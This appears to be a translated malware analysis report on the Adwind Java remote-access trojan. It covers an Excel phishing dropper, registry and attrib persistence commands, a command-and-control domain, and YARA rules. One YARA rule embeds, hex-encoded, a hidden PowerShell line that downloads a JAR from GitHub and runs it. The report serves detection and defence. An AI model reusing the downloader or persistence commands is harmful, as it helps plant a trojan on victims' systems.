Documente Academic
Documente Profesional
Documente Cultură
REPORT
CONTENTS
Information about the file paths, registry records, logs and all indicators of Adwind malware
type of Remote Access Trojan has been analyzed and reported in detail.
Introduction ........................................................... 2
Rapor.xlsx Document Analysis ............................. 3
Adwind.jar File Analysis ........................................ 4
Adwind.jar Network Analysis ................................. 7
Solution Proposals ................................................ 9
Yara Rule ............................................................ 10
Introduction
The developer of the RAT-type Adwind malware is a Mexican-based Spanish hacker and
started selling the java-based remote access tool (RAT) called "Frutas" in the Adwind
family in early 2012. It was changed at least seven times in the following years and was
released under the names Adwind, UnReCoM, Alien Spy, JSocket, JBifrots,
UnknownRat and JConnectPro.
Between 2013 and 2016, different versions of Adwind were used in attacks against at
least 443,000 private users in the world, commercial and non -commercial organizations.
Adwind RAT, which was renamed in early 2013, was offered for sale via various
communication methods such as Skype or mail. Adwind RAT, which was released with a
price of $ 55 at the first exit, has also been stated that the price will increase and be $
100 as of February 15th. With the update made in 2013, Android support was also
provided. Due to its many features and working on most platforms, it has beco me a very
popular tool in a short time. With this popularity, the developer of Adwind RAT opened a
Youtube channel and shared information such as how to use the tutorial videos of
Adwind RAT through this channel. Adwind RAT was used for the first time in a targeted
attack in Pacific Asia. In November 2013, the malware was renamed UNRECOM This
rebranded version of Adwind continued to retain all of its old features.
In 2014, Adwind's source code leaked and became available online for free, in response
to the leak, the "official" version of Adwind Trojan was significantly upgraded and re -
released as AlienSpy in October 2014. This version of the malware gained various
features such as detecting sandboxes, cryptographically secure communication with the
control server, and auto-detecting and disabling antivirus programs.
Rapor.xlsx Document Analysis
File Name Rapor.xlsx
Md5 5ba62c034584b88e44b5364e4131671c
Sha1 b4a8dfe2eebaf436c021458e515baf39ed812740
Sha256 9e61a8cf313337d2b72fc463164afc2e332fa26fda145c18fc6de6acd68af7db
Adwind malware comes as an excel document with phishing attacks on the system
first. When the excel document sent in addition to the mails with different content sent
to the victim was first opened by the victim, an excel document containing the
meaningless characters appears with the warning “you have to activate the content”.
After this warning, the excel document requests permission for cmd.exe to run a script
code hidden in its sub cells.
This piece of code downloads the actual malicious code via github and runs it without
any user permission and opening a console window to the screen. When we look at
the hex values of the excel docment, this piece of code appears..
This excel document, which is our first harmful file, does not do any harmful operation
except for downloading malicious code as dropper task.
The adwind.jar file, which is our downloaded malicious file, performs the actual
malicious processes. First of all, we see that when it is run on the system, it is obfuscate
with an allatori tool, which is an obfuscate tool.
It obfuscates itself, making it difficult to detect by anti viruses and analysts. Then makes
some checks when he works on the system. These controls are public ip detection and
country identification over the network. After passing these controls, it starts its harmful
activities on the system.
Firstly, it performs operations such as providing command permanence and providing
information to command and control servers by running commands on Shell. For this
purpose, it changes the access rights of the directory to access the directory where the
java program is installed on the system.
After getting these permissions, he writes to the beginning so that he can start himself every
time the computer is turned on. It selects the 'Uninstaller' folder created by the user to the \
AppData \ Roaming directory under the home directory.
"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v
JavaSun_Uninstall_00001_00002 /t REG_SZ /d
\%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe\ -jar
\%AppData%\Uninstall\Uninstall.Uninstaller\ /f"
After adding itself to the start directory, the hidden file with the parameter "+ h" to hide the
directory where it is located from the user with the tool "atrib.exe" in the windows system, to
prevent the changes that can be made on the file, to be perceived only as a read and system
file with "+ r". + s” sets it as a system file.
attrib +s +h +r %AppData%\Uninstall\*.*
attrib +s +h +r %AppData%\Uninstall
After these processes, it now ensures its permanence and access on the system.
Our malware uses WMIC.exe to detect AV software running on the system as soon as it starts
itself.
After these processes, it hides the “Uninstall” file created by the user in the home directory .
attrib +H %UserProfile%\.Uninstall
First, the victim uses amazon's servers to get the system's public ip address. It identifies the
IP address of the victim system via the address "http://checkip[.]amazonaws [.]com".
Using the API of "ipinfo [.]io" site, it determines the country where the victim is located. Harmful
Turkey's target is the location, Country code TR is the external work.
After these operations, it performs its harmful activities on the system and it has been
determined that it communicates with the command and control server 21736[.]xyz domain.
These solutions can prevent the Adwind malware of Trojan Rat from infecting and
damaging the system.
Yara Rule
import "hash"
rule Rapor: xlsx
{
meta:
description = "Adwind RAT Trojan"
first_date = "13.05.2020"
report_date = "18.07.2020"
file_name = "Rapor.xlsx"
strings:
$s1 = {63 6D 64 03 2F 63 20 70 6F 77 65 72 73 68 65 6C 6C 20 2D 65 78 65 63 75 74
69 6F 6E 70 6F 6C 69 63 79 20 62 79 70 61 73 73 20 2D 57 20 48 69 64 64 65 6E 20 2D 63 6F 6D 6D
61 6E 64 20 22 26 20 7B 20 28 6E 65 77 2D 6F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E
57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 46 69 6C 65 28 5C 22 68 74 74 70 73 3A
2F 2F 72 61 77 2E 67 69 74 68 75 62 75 73 65 72 63 6F 6E 74 65 6E 74 2E 63 6F 6D 2F 35 33 30 38
36 38 32 2F 34 79 62 61 38 34 34 34 6D 74 63 72 61 31 31 2F 67 68 2D 70 61 67 65 73 2F 77 75 63
67 79 33 6A 65 63 77 67 70 76 2E 73 76 67 5C 22 20 2C 5C 22 20 25 74 6D 70 25 5C 5C 41 43 4A 54
55 2E 6A 61 72 5C 22 29 20 7D 22 20 26 20 25 74 6D 70 25 5C 5C 41 43 4A 54 55 2E 6A 61 72 23 00
15 00 E2 7F 00 00 00 00 0E 59 32 31 35 49 4E 59 46 59 52 46 51 50 45 55}
$s2 = "https://raw.githubusercontent.com/5308682/4yba8444mtcra11/gh-
pages/wucgy3jecwgpv.svg"
condition:
hash.md5(0,filesize) == "5ba62c034584b88e44b5364e4131671c" or $s1 or $s2
}
rule Adwind: java
{
meta:
description = "Adwind RAT Trojan"
first_date = "13.05.2020"
report_date = "18.07.2020"
file_name = "Adwind.jar"
strings:
$s1 = "16245"
$s2 = "A$D.class"
$s3 = "A.class"
$s4 = "B.class"
$s5 = "C.class"
$s6 = "D$A.class"
$s7 = "D.class"
$s8 = "u2Br3cvUkb"
$s9 = "c.class"
$s10 = "n.class"
$s11 ="mny\\zsh"
condition:
hash.md5(0,filesize) == "8961392f55bdbfaa48c906ab5594afe3" or all of the m